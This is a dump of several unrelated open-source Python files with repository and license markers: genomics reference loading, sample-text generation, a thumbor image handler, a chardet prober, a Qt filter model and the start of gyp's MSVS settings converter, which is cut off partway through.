super(HtslibReferenceSet, self).__init__(localId)
self._dataDir = dataDir
self._setMetadata()
self._scanDataFiles(dataDir, ["*.fa.gz"])
def _setMetadata(self):
metadataFileName = '{}.json'.format(self._dataDir)
with open(metadataFileName) as metadataFile:
metadata = json.load(metadataFile)
try:
self._assemblyId = metadata['assemblyId']
self._description = metadata['description']
self._isDerived = metadata['isDerived']
self._ncbiTaxonId = metadata['ncbiTaxonId']
self._sourceAccessions = metadata['sourceAccessions']
self._sourceUri = metadata['sourceUri']
except KeyError as err:
raise exceptions.MissingReferenceSetMetadata(
metadataFileName, str(err))
def _addDataFile(self, path):
dirname, filename = os.path.split(path)
localId = filename.split(".")[0]
metadataFileName = os.path.join(dirname, "{}.json".format(localId))
with open(metadataFileName) as metadataFile:
metadata = json.load(metadataFile)
reference = HtslibReference(self, localId, path, metadata)
self.addReference(reference)
class HtslibReference(datamodel.PysamDatamodelMixin, AbstractReference):
"""
A reference based on data stored in a file on the file system
"""
def __init__(self, parentContainer, localId, dataFile, metadata):
super(HtslibReference, self).__init__(parentContainer, localId)
self._fastaFilePath = dataFile
fastaFile = self.getFileHandle(dataFile)
numReferences = len(fastaFile.references)
if numReferences != 1:
raise exceptions.NotExactlyOneReferenceException(
self._fastaFilePath, numReferences)
if fastaFile.references[0] != localId:
raise exceptions.InconsistentReferenceNameException(
self._fastaFilePath)
self._length = fastaFile.lengths[0]
try:
self._md5checksum = metadata["md5checksum"]
self._sourceUri = metadata["sourceUri"]
self._ncbiTaxonId = metadata["ncbiTaxonId"]
self._isDerived = metadata["isDerived"]
self._sourceDivergence = metadata["sourceDivergence"]
self._sourceAccessions = metadata["sourceAccessions"]
except KeyError as err:
raise exceptions.MissingReferenceMetadata(dataFile, str(err))
def getFastaFilePath(self):
"""
Returns the fasta file that this reference is derived from.
"""
return self._fastaFilePath
def openFile(self, dataFile):
return pysam.FastaFile(dataFile)
def getBases(self, start, end):
self.checkQueryRange(start, end)
fastaFile = self.getFileHandle(self._fastaFilePath)
# TODO we should have some error checking here...
bases = fastaFile.fetch(self.getLocalId(), start, end)
return bases
| apache-2.0 |
SarathkumarJ/snapboard | snapboard/sampledata.py | 4 | 4553 | #
# Sample data for testing
#
leadins = """To characterize a linguistic level L,
On the other hand,
This suggests that
It appears that
Furthermore,
We will bring evidence in favor of the following thesis:
To provide a constituent structure for T(Z,K),
From C1, it follows that
For any transformation which is sufficiently diversified in application to be of any interest,
Analogously,
Clearly,
Note that
Of course,
Suppose, for instance, that
Thus
With this clarification,
Conversely,
We have already seen that
By combining adjunctions and certain deformations,
I suggested that these results would follow from the assumption that
If the position of the trace in (99c) were only relatively inaccessible to movement,
However, this assumption is not correct, since
Comparing these examples with their parasitic gap counterparts in (96) and (97), we see that
In the discussion of resumptive pronouns following (81),
So far,
Nevertheless,
For one thing,
Summarizing, then, we assume that
A consequence of the approach just outlined is that
Presumably,
On our assumptions,
It may be, then, that
It must be emphasized, once again, that
Let us continue to suppose that
Notice, incidentally, that """
# List of LEADINs to buy time.
subjects = """ the notion of level of grammaticalness
a case of semigrammaticalness of a different sort
most of the methodological work in modern linguistics
a subset of English sentences interesting on quite independent grounds
the natural general principle that will subsume this case
an important property of these three types of EC
any associated supporting element
the appearance of parasitic gaps in domains relatively inaccessible to ordinary extraction
the speaker-hearer's linguistic intuition
the descriptive power of the base component
the earlier discussion of deviance
this analysis of a formative as a pair of sets of features
this selectionally introduced contextual feature
a descriptively adequate grammar
the fundamental error of regarding functional notions as categorial
relational information
the systematic use of complex symbols
the theory of syntactic features developed earlier"""
# List of SUBJECTs chosen for maximum professorial macho.
verbs = """can be defined in such a way as to impose
delimits
suffices to account for
cannot be arbitrary in
is not subject to
does not readily tolerate
raises serious doubts about
is not quite equivalent to
does not affect the structure of
may remedy and, at the same time, eliminate
is not to be considered in determining
is to be regarded as
is unspecified with respect to
is, apparently, determined by
is necessary to impose an interpretation on
appears to correlate rather closely with
is rather different from"""
#List of VERBs chosen for autorecursive obfuscation.
objects = """ problems of phonemic and morphological analysis.
a corpus of utterance tokens upon which conformity has been defined by the paired utterance test.
the traditional practice of grammarians.
the levels of acceptability from fairly high (e.g. (99a)) to virtual gibberish (e.g. (98d)).
a stipulation to place the constructions into these various categories.
a descriptive fact.
a parasitic gap construction.
the extended c-command discussed in connection with (34).
the ultimate standard that determines the accuracy of any proposed grammar.
the system of base rules exclusive of the lexicon.
irrelevant intervening contexts in selectional rules.
nondistinctness in the sense of distinctive feature theory.
a general convention regarding the forms of the grammar.
an abstract underlying order.
an important distinction in language use.
the requirement that branching is not tolerated within the dominance scope of a complex symbol.
the strong generative capacity of the theory."""
# List of OBJECTs selected for profound sententiousness.
import textwrap, random
from itertools import chain, islice, izip
def sample_data(times=1, line_length=72):
parts = []
for part in (leadins, subjects, verbs, objects):
phraselist = map(str.strip, part.splitlines())
random.shuffle(phraselist)
parts.append(phraselist)
output = chain(*islice(izip(*parts), 0, times))
return ' '.join(output)
# vim: ai ts=4 sts=4 et sw=4
| bsd-3-clause |
atizo/kluster | src/kluster/core/utils.py | 1 | 1079 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Kluster - A clustering Web Service
#
# Copyright (C) 2011 Atizo AG and individual contributors (see AUTHORS).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
def get_platrom_url(request=None):
platrom_url = None
if request:
platrom_url = request.META.get('SERVER_NAME')
if platrom_url:
return platrom_url
else:
return settings.PLATFORM_URL
| gpl-3.0 |
felipemorais/thumbor | thumbor/handlers/image_resource.py | 11 | 2698 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
import datetime
from thumbor.handlers import ImageApiHandler
from thumbor.engines import BaseEngine
import tornado.gen as gen
import tornado.web
##
# Handler to retrieve or modify existing images
# This handler support GET, PUT and DELETE method to manipulate existing images
##
class ImageResourceHandler(ImageApiHandler):
@gen.coroutine
def check_resource(self, id):
id = id[:self.context.config.MAX_ID_LENGTH]
# Check if image exists
exists = yield gen.maybe_future(self.context.modules.storage.exists(id))
if exists:
body = yield gen.maybe_future(self.context.modules.storage.get(id))
self.set_status(200)
mime = BaseEngine.get_mimetype(body)
if mime:
self.set_header('Content-Type', mime)
max_age = self.context.config.MAX_AGE
if max_age:
self.set_header('Cache-Control', 'max-age=' + str(max_age) + ',public')
self.set_header('Expires', datetime.datetime.utcnow() + datetime.timedelta(seconds=max_age))
self.write(body)
self.finish()
else:
self._error(404, 'Image not found at the given URL')
def put(self, id):
id = id[:self.context.config.MAX_ID_LENGTH]
# Check if image overwriting is allowed
if not self.context.config.UPLOAD_PUT_ALLOWED:
self._error(405, 'Unable to modify an uploaded image')
return
# Check if the image uploaded is valid
if self.validate(self.request.body):
self.write_file(id, self.request.body)
self.set_status(204)
@tornado.web.asynchronous
@tornado.gen.coroutine
def delete(self, id):
id = id[:self.context.config.MAX_ID_LENGTH]
# Check if image deleting is allowed
if not self.context.config.UPLOAD_DELETE_ALLOWED:
self._error(405, 'Unable to delete an uploaded image')
return
# Check if image exists
exists = yield gen.maybe_future(self.context.modules.storage.exists(id))
if exists:
self.context.modules.storage.remove(id)
self.set_status(204)
else:
self._error(404, 'Image not found at the given URL')
@tornado.web.asynchronous
def get(self, id):
self.check_resource(id)
@tornado.web.asynchronous
def head(self, id):
self.check_resource(id)
| mit |
noba3/KoTos | addons/plugin.program.iptvxtra/resources/lib/requests/packages/chardet/gb2312prober.py | 2994 | 1681 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import GB2312DistributionAnalysis
from .mbcssm import GB2312SMModel
class GB2312Prober(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(GB2312SMModel)
self._mDistributionAnalyzer = GB2312DistributionAnalysis()
self.reset()
def get_charset_name(self):
return "GB2312"
| gpl-2.0 |
ergoregion/Rota-Program | Rota_System/UI/Candidating/model_population_filter.py | 1 | 1650 | __author__ = 'Neil Butcher'
from PyQt4 import QtGui
class PopulationSortFilterModel(QtGui.QSortFilterProxyModel):
def __init__(self, parent):
QtGui.QAbstractProxyModel.__init__(self, parent)
self.setDynamicSortFilter(True)
self._filters = []
self._antifilters = []
self._sorter = None
def set_sorter(self, new_sorter):
self._sorter = new_sorter
self.invalidate()
def clear_filters(self):
self._filters = []
self._antifilters = []
self.invalidateFilter()
def set_filters(self, new_filters):
self._filters = new_filters
self.invalidateFilter()
def add_filter(self, new_filter):
self._filters.append(new_filter)
self.invalidateFilter()
def add_reversed_filter(self, new_filter):
self._antifilters.append(new_filter)
self.invalidateFilter()
def filterAcceptsRow(self, source_row, source_parent):
person = self.sourceModel().population[source_row]
for f in self._filters:
if f.mask(person):
return False
for f in self._antifilters:
if not f.mask(person):
return False
return True
def lessThan(self, left_index, right_index):
if not self._sorter:
return False
left_person = self.sourceModel().object(left_index)
right_person = self.sourceModel().object(right_index)
return self._sorter.lessThan(left_person, right_person)
def object(self, index):
source_index = self.mapToSource(index)
return self.sourceModel().object(source_index)
| mit |
holoju/agetic-impuestos | node_modules/node-gyp/gyp/pylib/gyp/MSVSSettings.py | 1361 | 45045 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
r"""Code to validate and convert settings of the Microsoft build tools.
This file contains code to validate and convert settings of the Microsoft
build tools. The function ConvertToMSBuildSettings(), ValidateMSVSSettings(),
and ValidateMSBuildSettings() are the entry points.
This file was created by comparing the projects created by Visual Studio 2008
and Visual Studio 2010 for all available settings through the user interface.
The MSBuild schemas were also considered. They are typically found in the
MSBuild install directory, e.g. c:\Program Files (x86)\MSBuild
"""
import sys
import re
# Dictionaries of settings validators. The key is the tool name, the value is
# a dictionary mapping setting names to validation functions.
_msvs_validators = {}
_msbuild_validators = {}
# A dictionary of settings converters. The key is the tool name, the value is
# a dictionary mapping setting names to conversion functions.
_msvs_to_msbuild_converters = {}
# Tool name mapping from MSVS to MSBuild.
_msbuild_name_of_tool = {}
class _Tool(object):
"""Represents a tool used by MSVS or MSBuild.
Attributes:
msvs_name: The name of the tool in MSVS.
msbuild_name: The name of the tool in MSBuild.
"""
def __init__(self, msvs_name, msbuild_name):
self.msvs_name = msvs_name
self.msbuild_name = msbuild_name
def _AddTool(tool):
"""Adds a tool to the four dictionaries used to process settings.
This only defines the tool. Each setting also needs to be added.
Args:
tool: The _Tool object to be added.
"""
_msvs_validators[tool.msvs_name] = {}
_msbuild_validators[tool.msbuild_name] = {}
_msvs_to_msbuild_converters[tool.msvs_name] = {}
_msbuild_name_of_tool[tool.msvs_name] = tool.msbuild_name
def _GetMSBuildToolSettings(msbuild_settings, tool):
"""Returns an MSBuild tool dictionary. Creates it if needed."""
return msbuild_settings.setdefault(tool.msbuild_name, {})
class _Type(object):
"""Type of settings (Base class)."""
def ValidateMSVS(self, value):
"""Verifies that the value is legal for MSVS.
Args:
value: the value to check for this type.
Raises:
ValueError if value is not valid for MSVS.
"""
def ValidateMSBuild(self, value):
"""Verifies that the value is legal for MSBuild.
Args:
value: the value to check for this type.
Raises:
ValueError if value is not valid for MSBuild.
"""
def ConvertToMSBuild(self, value):
"""Returns the MSBuild equivalent of the MSVS value given.
Args:
value: the MSVS value to convert.
Returns:
the MSBuild equivalent.
Raises:
ValueError if value is not valid.
"""
return value
class _String(_Type):
"""A setting that's just a string."""
def ValidateMSVS(self, value):
if not isinstance(value, basestring):
raise ValueError('expected string; got %r' % value)
def ValidateMSBuild(self, value):
if not isinstance(value, basestring):
raise ValueError('expected string; got %r' % value)
def ConvertToMSBuild(self, value):
# Convert the macros
return ConvertVCMacrosToMSBuild(value)
class _StringList(_Type):
"""A settings that's a list of strings."""
def ValidateMSVS(self, value):
if not isinstance(value, basestring) and not isinstance(value, list):
raise ValueError('expected string list; got %r' % value)
def ValidateMSBuild(self, value):
if not isinstance(value, basestring) and not isinstance(value, list):
raise ValueError('expected string list; got %r' % value)
def ConvertToMSBuild(self, value):
# Convert the macros
if isinstance(value, list):
return [ConvertVCMacrosToMSBuild(i) for i in value]
else:
return ConvertVCMacrosToMSBuild(value)
class _Boolean(_Type):
"""Boolean settings, can have the values 'false' or 'true'."""
def _Validate(self, value):
if value != 'true' and value != 'false':
raise ValueError('expected bool; got %r' % value)
def ValidateMSVS(self, value):
self._Validate(value)
def ValidateMSBuild(self, value):
self._Validate(value)
def ConvertToMSBuild(self, value):
self._Validate(value)
return value
class _Integer(_Type):
"""Integer settings."""
def __init__(self, msbuild_base=10):
_Type.__init__(self)
self._msbuild_base = msbuild_base
def ValidateMSVS(self, value):
# Try to convert, this will raise ValueError if invalid.
self.ConvertToMSBuild(value)
def ValidateMSBuild(self, value):
# Try to convert, this will raise ValueError if invalid.
int(value, self._msbuild_base)
def ConvertToMSBuild(self, value):
msbuild_format = (self._msbuild_base == 10) and '%d' or '0x%04x'
return msbuild_format % int(value)
class _Enumeration(_Type):
"""Type of settings that is an enumeration.
In MSVS, the values are indexes like '0', '1', and '2'.
MSBuild uses text labels that are more representative, like 'Win32'.
Constructor args:
label_list: an array of MSBuild labels that correspond to the MSVS index.
In the rare cases where MSVS has skipped an index value, None is
used in the array to indicate the unused spot.
new: an array of labels that are new to MSBuild.
"""
def __init__(self, label_list, new=None):
_Type.__init__(self)
self._label_list = label_list
self._msbuild_values = set(value for value in label_list
if value is not None)
if new is not None:
self._msbuild_values.update(new)
def ValidateMSVS(self, value):
# Try to convert. It will raise an exception if not valid.
self.ConvertToMSBuild(value)
def ValidateMSBuild(self, value):
if value not in self._msbuild_values:
raise ValueError('unrecognized enumerated value %s' % value)
def ConvertToMSBuild(self, value):
index = int(value)
if index < 0 or index >= len(self._label_list):
raise ValueError('index value (%d) not in expected range [0, %d)' %
(index, len(self._label_list)))
label = self._label_list[index]
if label is None:
raise ValueError('converted value for %s not specified.' % value)
return label
# Instantiate the various generic types.
_boolean = _Boolean()
_integer = _Integer()
# For now, we don't do any special validation on these types:
_string = _String()
_file_name = _String()
_folder_name = _String()
_file_list = _StringList()
_folder_list = _StringList()
_string_list = _StringList()
# Some boolean settings went from numerical values to boolean. The
# mapping is 0: default, 1: false, 2: true.
_newly_boolean = _Enumeration(['', 'false', 'true'])
def _Same(tool, name, setting_type):
"""Defines a setting that has the same name in MSVS and MSBuild.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
name: the name of the setting.
setting_type: the type of this setting.
"""
_Renamed(tool, name, name, setting_type)
def _Renamed(tool, msvs_name, msbuild_name, setting_type):
"""Defines a setting for which the name has changed.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
msvs_name: the name of the MSVS setting.
msbuild_name: the name of the MSBuild setting.
setting_type: the type of this setting.
"""
def _Translate(value, msbuild_settings):
msbuild_tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
msbuild_tool_settings[msbuild_name] = setting_type.ConvertToMSBuild(value)
_msvs_validators[tool.msvs_name][msvs_name] = setting_type.ValidateMSVS
_msbuild_validators[tool.msbuild_name][msbuild_name] = (
setting_type.ValidateMSBuild)
_msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
def _Moved(tool, settings_name, msbuild_tool_name, setting_type):
_MovedAndRenamed(tool, settings_name, msbuild_tool_name, settings_name,
setting_type)
def _MovedAndRenamed(tool, msvs_settings_name, msbuild_tool_name,
msbuild_settings_name, setting_type):
"""Defines a setting that may have moved to a new section.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
msvs_settings_name: the MSVS name of the setting.
msbuild_tool_name: the name of the MSBuild tool to place the setting under.
msbuild_settings_name: the MSBuild name of the setting.
setting_type: the type of this setting.
"""
def _Translate(value, msbuild_settings):
tool_settings = msbuild_settings.setdefault(msbuild_tool_name, {})
tool_settings[msbuild_settings_name] = setting_type.ConvertToMSBuild(value)
_msvs_validators[tool.msvs_name][msvs_settings_name] = (
setting_type.ValidateMSVS)
validator = setting_type.ValidateMSBuild
_msbuild_validators[msbuild_tool_name][msbuild_settings_name] = validator
_msvs_to_msbuild_converters[tool.msvs_name][msvs_settings_name] = _Translate
def _MSVSOnly(tool, name, setting_type):
"""Defines a setting that is only found in MSVS.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
name: the name of the setting.
setting_type: the type of this setting.
"""
def _Translate(unused_value, unused_msbuild_settings):
# Since this is for MSVS only settings, no translation will happen.
pass
_msvs_validators[tool.msvs_name][name] = setting_type.ValidateMSVS
_msvs_to_msbuild_converters[tool.msvs_name][name] = _Translate
def _MSBuildOnly(tool, name, setting_type):
"""Defines a setting that is only found in MSBuild.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
name: the name of the setting.
setting_type: the type of this setting.
"""
def _Translate(value, msbuild_settings):
# Let msbuild-only properties get translated as-is from msvs_settings.
tool_settings = msbuild_settings.setdefault(tool.msbuild_name, {})
tool_settings[name] = value
_msbuild_validators[tool.msbuild_name][name] = setting_type.ValidateMSBuild
_msvs_to_msbuild_converters[tool.msvs_name][name] = _Translate
def _ConvertedToAdditionalOption(tool, msvs_name, flag):
"""Defines a setting that's handled via a command line option in MSBuild.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
msvs_name: the name of the MSVS setting that if 'true' becomes a flag
flag: the flag to insert at the end of the AdditionalOptions
"""
def _Translate(value, msbuild_settings):
if value == 'true':
tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
if 'AdditionalOptions' in tool_settings:
new_flags = '%s %s' % (tool_settings['AdditionalOptions'], flag)
else:
new_flags = flag
tool_settings['AdditionalOptions'] = new_flags
_msvs_validators[tool.msvs_name][msvs_name] = _boolean.ValidateMSVS
_msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
def _CustomGeneratePreprocessedFile(tool, msvs_name):
def _Translate(value, msbuild_settings):
tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
if value == '0':
tool_settings['PreprocessToFile'] = 'false'
tool_settings['PreprocessSuppressLineNumbers'] = 'false'
elif value == '1': # /P
tool_settings['PreprocessToFile'] = 'true'
tool_settings['PreprocessSuppressLineNumbers'] = 'false'
elif value == '2': # /EP /P
tool_settings['PreprocessToFile'] = 'true'
tool_settings['PreprocessSuppressLineNumbers'] = 'true'
else:
raise ValueError('value must be one of [0, 1, 2]; got %s' % value)
# Create a bogus validator that looks for '0', '1', or '2'
msvs_validator = _Enumeration(['a', 'b', 'c']).ValidateMSVS
_msvs_validators[tool.msvs_name][msvs_name] = msvs_validator
msbuild_validator = _boolean.ValidateMSBuild
msbuild_tool_validators = _msbuild_validators[tool.msbuild_name]
msbuild_tool_validators['PreprocessToFile'] = msbuild_validator
msbuild_tool_validators['PreprocessSuppressLineNumbers'] = msbuild_validator
_msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
fix_vc_macro_slashes_regex_list = ('IntDir', 'OutDir')
fix_vc_macro_slashes_regex = re.compile(
r'(\$\((?:%s)\))(?:[\\/]+)' % "|".join(fix_vc_macro_slashes_regex_list)
)
# Regular expression to detect keys that were generated by exclusion lists
_EXCLUDED_SUFFIX_RE = re.compile('^(.*)_excluded$')
def _ValidateExclusionSetting(setting, settings, error_msg, stderr=sys.stderr):
"""Verify that 'setting' is valid if it is generated from an exclusion list.
If the setting appears to be generated from an exclusion list, the root name
is checked.
Args:
setting: A string that is the setting name to validate
settings: A dictionary where the keys are valid settings
error_msg: The message to emit in the event of error
stderr: The stream receiving the error messages.
"""
# This may be unrecognized because it's an exclusion list. If the
# setting name has the _excluded suffix, then check the root name.
unrecognized = True
m = re.match(_EXCLUDED_SUFFIX_RE, setting)
if m:
root_setting = m.group(1)
unrecognized = root_setting not in settings
if unrecognized:
# We don't know this setting. Give a warning.
print >> stderr, error_msg
def FixVCMacroSlashes(s):
"""Replace macros which have excessive following slashes.
These macros are known to have a built-in trailing slash. Furthermore, many
scripts hiccup on processing paths with extra slashes in the middle.
This list is probably not exhaustive. Add as needed.
"""
if '$' in s:
s = fix_vc_macro_slashes_regex.sub(r'\1', s)
return s
def ConvertVCMacrosToMSBuild(s):
"""Convert the the MSVS macros found in the string to the MSBuild equivalent.
This list is probably not exhaustive. Add as needed.
"""
if '$' in s:
replace_map = {
'$(ConfigurationName)': '$(Configuration)',
'$(InputDir)': '%(RelativeDir)',
'$(InputExt)': '%(Extension)',
'$(InputFileName)': '%(Filename)%(Extension)',
'$(InputName)': '%(Filename)',
'$(InputPath)': '%(Identity)',
'$(ParentName)': '$(ProjectFileName)',
'$(PlatformName)': '$(Platform)',
'$(SafeInputName)': '%(Filename)',
}
for old, new in replace_map.iteritems():
s = s.replace(old, new)
s = FixVCMacroSlashes(s)
return s
def ConvertToMSBuildSettings(msvs_settings, stderr=sys.stderr):
"""Converts MSVS settings (VS2008 and earlier) to MSBuild settings (VS2010+).
Args:
msvs_settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
Returns:
A dictionary of MSBuild settings. The key is either the MSBuild tool name
or the empty string (for the global settings). The values are themselves
dictionaries of settings and their values.
"""
msbuild_settings = {}
for msvs_tool_name, msvs_tool_settings in msvs_settings.iteritems():
if msvs_tool_name in _msvs_to_msbuild_converters:
msvs_tool = _msvs_to_msbuild_converters[msvs_tool_name]
for msvs_setting, msvs_value in msvs_tool_settings.iteritems():
if msvs_setting in msvs_tool:
# Invoke the translation function.
try:
msvs_tool[msvs_setting](msvs_value, msbuild_settings)
except ValueError, e:
print >> stderr, ('Warning: while converting %s/%s to MSBuild, '
'%s' % (msvs_tool_name, msvs_setting, e))
else:
_ValidateExclusionSetting(msvs_setting,
msvs_tool,
('Warning: unrecognized setting %s/%s '
'while converting to MSBuild.' %
(msvs_tool_name, msvs_setting)),
stderr)
else:
print >> stderr, ('Warning: unrecognized tool %s while converting to '
'MSBuild.' % msvs_tool_name)
return msbuild_settings
def ValidateMSVSSettings(settings, stderr=sys.stderr):
"""Validates that the names of the settings are valid for MSVS.
Args:
settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
"""
_ValidateSettings(_msvs_validators, settings, stderr)
def ValidateMSBuildSettings(settings, stderr=sys.stderr):
"""Validates that the names of the settings are valid for MSBuild.
Args:
settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
"""
_ValidateSettings(_msbuild_validators, settings, stderr)
def _ValidateSettings(validators, settings, stderr):
"""Validates that the settings are valid for MSBuild or MSVS.
We currently only validate the names of the settings, not their values.
Args:
validators: A dictionary of tools and their validators.
settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
"""
for tool_name in settings:
if tool_name in validators:
tool_validators = validators[tool_name]
for setting, value in settings[tool_name].iteritems():
if setting in tool_validators:
try:
tool_validators[setting](value)
except ValueError, e:
print >> stderr, ('Warning: for %s/%s, %s' %
(tool_name, setting, e))
else:
_ValidateExclusionSetting(setting,
tool_validators,
('Warning: unrecognized setting %s/%s' %
(tool_name, setting)),
stderr)
else:
print >> stderr, ('Warning: unrecognized tool %s' % tool_name)
# MSVS and MBuild names of the tools.
_compile = _Tool('VCCLCompilerTool', 'ClCompile')
_link = _Tool('VCLinkerTool', 'Link')
_midl = _Tool('VCMIDLTool', 'Midl')
_rc = _Tool('VCResourceCompilerTool', 'ResourceCompile')
_lib = _Tool('VCLibrarianTool', 'Lib')
_manifest = _Tool('VCManifestTool', 'Manifest')
_masm = _Tool('MASM', 'MASM')
_AddTool(_compile)
_AddTool(_link)
_AddTool(_midl)
_AddTool(_rc)
_AddTool(_lib)
_AddTool(_manifest)
_AddTool(_masm)
# Add sections only found in the MSBuild settings.
_msbuild_validators[''] = {}
_msbuild_validators['ProjectReference'] = {}
_msbuild_validators['ManifestResourceCompile'] = {}
# Descriptions of the compiler options, i.e. VCCLCompilerTool in MSVS and
# ClCompile in MSBuild.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\cl.xml" for
# the schema of the MSBuild ClCompile settings.
# Options that have the same name in MSVS and MSBuild
_Same(_compile, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_compile, 'AdditionalOptions', _string_list)
_Same(_compile, 'AdditionalUsingDirectories', _folder_list) # /AI
_Same(_compile, 'AssemblerListingLocation', _file_name) # /Fa
_Same(_compile, 'BrowseInformationFile', _file_name)
_Same(_compile, 'BufferSecurityCheck', _boolean) # /GS
_Same(_compile, 'DisableLanguageExtensions', _boolean) # /Za
_Same(_compile, 'DisableSpecificWarnings', _string_list) # /wd
_Same(_compile, 'EnableFiberSafeOptimizations', _boolean) # /GT
_Same(_compile, 'EnablePREfast', _boolean) # /analyze Visible='false'
_Same(_compile, 'ExpandAttributedSource', _boolean) # /Fx
_Same(_compile, 'FloatingPointExceptions', _boolean) # /fp:except
_Same(_compile, 'ForceConformanceInForLoopScope', _boolean) # /Zc:forScope
_Same(_compile, 'ForcedIncludeFiles', _file_list) # /FI
_Same(_compile, 'ForcedUsingFiles', _file_list) # /FU
_Same(_compile, 'GenerateXMLDocumentationFiles', _boolean) # /doc
_Same(_compile, 'IgnoreStandardIncludePath', _boolean) # /X
_Same(_compile, 'MinimalRebuild', _boolean) # /Gm
_Same(_compile, 'OmitDefaultLibName', _boolean) # /Zl
_Same(_compile, 'OmitFramePointers', _boolean) # /Oy
_Same(_compile, 'PreprocessorDefinitions', _string_list) # /D
_Same(_compile, 'ProgramDataBaseFileName', _file_name) # /Fd
_Same(_compile, 'RuntimeTypeInfo', _boolean) # /GR
_Same(_compile, 'ShowIncludes', _boolean) # /showIncludes
_Same(_compile, 'SmallerTypeCheck', _boolean) # /RTCc
_Same(_compile, 'StringPooling', _boolean) # /GF
_Same(_compile, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_compile, 'TreatWChar_tAsBuiltInType', _boolean) # /Zc:wchar_t
_Same(_compile, 'UndefineAllPreprocessorDefinitions', _boolean) # /u
_Same(_compile, 'UndefinePreprocessorDefinitions', _string_list) # /U
_Same(_compile, 'UseFullPaths', _boolean) # /FC
_Same(_compile, 'WholeProgramOptimization', _boolean) # /GL
_Same(_compile, 'XMLDocumentationFileName', _file_name)
_Same(_compile, 'AssemblerOutput',
_Enumeration(['NoListing',
'AssemblyCode', # /FA
'All', # /FAcs
'AssemblyAndMachineCode', # /FAc
'AssemblyAndSourceCode'])) # /FAs
_Same(_compile, 'BasicRuntimeChecks',
_Enumeration(['Default',
'StackFrameRuntimeCheck', # /RTCs
'UninitializedLocalUsageCheck', # /RTCu
'EnableFastChecks'])) # /RTC1
_Same(_compile, 'BrowseInformation',
_Enumeration(['false',
'true', # /FR
'true'])) # /Fr
_Same(_compile, 'CallingConvention',
_Enumeration(['Cdecl', # /Gd
'FastCall', # /Gr
'StdCall', # /Gz
'VectorCall'])) # /Gv
_Same(_compile, 'CompileAs',
_Enumeration(['Default',
'CompileAsC', # /TC
'CompileAsCpp'])) # /TP
_Same(_compile, 'DebugInformationFormat',
_Enumeration(['', # Disabled
'OldStyle', # /Z7
None,
'ProgramDatabase', # /Zi
'EditAndContinue'])) # /ZI
_Same(_compile, 'EnableEnhancedInstructionSet',
_Enumeration(['NotSet',
'StreamingSIMDExtensions', # /arch:SSE
'StreamingSIMDExtensions2', # /arch:SSE2
'AdvancedVectorExtensions', # /arch:AVX (vs2012+)
'NoExtensions', # /arch:IA32 (vs2012+)
# This one only exists in the new msbuild format.
'AdvancedVectorExtensions2', # /arch:AVX2 (vs2013r2+)
]))
_Same(_compile, 'ErrorReporting',
_Enumeration(['None', # /errorReport:none
'Prompt', # /errorReport:prompt
'Queue'], # /errorReport:queue
new=['Send'])) # /errorReport:send"
_Same(_compile, 'ExceptionHandling',
_Enumeration(['false',
'Sync', # /EHsc
'Async'], # /EHa
new=['SyncCThrow'])) # /EHs
_Same(_compile, 'FavorSizeOrSpeed',
_Enumeration(['Neither',
'Speed', # /Ot
'Size'])) # /Os
_Same(_compile, 'FloatingPointModel',
_Enumeration(['Precise', # /fp:precise
'Strict', # /fp:strict
'Fast'])) # /fp:fast
_Same(_compile, 'InlineFunctionExpansion',
_Enumeration(['Default',
'OnlyExplicitInline', # /Ob1
'AnySuitable'], # /Ob2
